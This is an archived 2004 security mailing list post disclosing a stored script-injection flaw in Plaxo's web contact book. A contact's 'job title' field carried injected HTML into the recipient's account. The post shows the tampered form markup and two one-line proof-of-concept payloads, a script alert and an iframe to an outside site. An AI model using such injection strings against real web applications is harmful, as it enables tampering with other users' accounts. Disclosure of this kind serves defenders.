lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200403121754.i2CHsFYb004574@web128.megawebservers.com>
From: 1 at malware.com (http-equiv@...ite.com)
Subject: PLAXO: is that a cure or a disease?


Friday, March 12, 2004

Having a firm belief in unnecessary gadgetry, we recently sent 
our most senior colleague Liu Die Yu a request to update his 
contact information via our plaxo device 
[http://www.plaxo.com/]. Checking back several hours later in 
our plaxo web account we eagerly selected his "card" to see what 
that update might be.

BANG !

<input type="hidden" name="SetReplied" value="">
<input type="hidden" name="perm" value="1">
<input type="hidden" name="saveChanges" value="1">
<input type="hidden" name="close" value="0">
<input type="hidden" name="Biz.FullName" value="fatcat">
<input type="hidden" name="Biz.Title" value=""><iframe 
src=http://www.bloatedcorp.com>">
<input type="hidden" name="Biz.Email1" 
value="fatcat@...atedcorp.com">
<input type="hidden" name="Biz.Email2"  value="">
<input type="hidden" name="Biz.Email3"  value="">
<input type="hidden" name="Biz.IM"  value="">
<input type="hidden" name="Biz.WebPage"  value="">

He had taken our entire contact list for a joyride supreme.

Trivial arbitrary code injection into the plaxo user web 
account. While it does a good job of attempting to defeat this, 
simple input in the recipient request for update field of  "JOB 
TITLE", gives a real jobbing:

"><SCRIPT>alert('boop')</SCRIPT>
"><iframe src=http://www.bloatedcorp.com>

Needless to say should you receive one of these irritating 
little requests, you'll now know what to do.


End Call

-- 
http://www.malware.com







Powered by blists - more mailing lists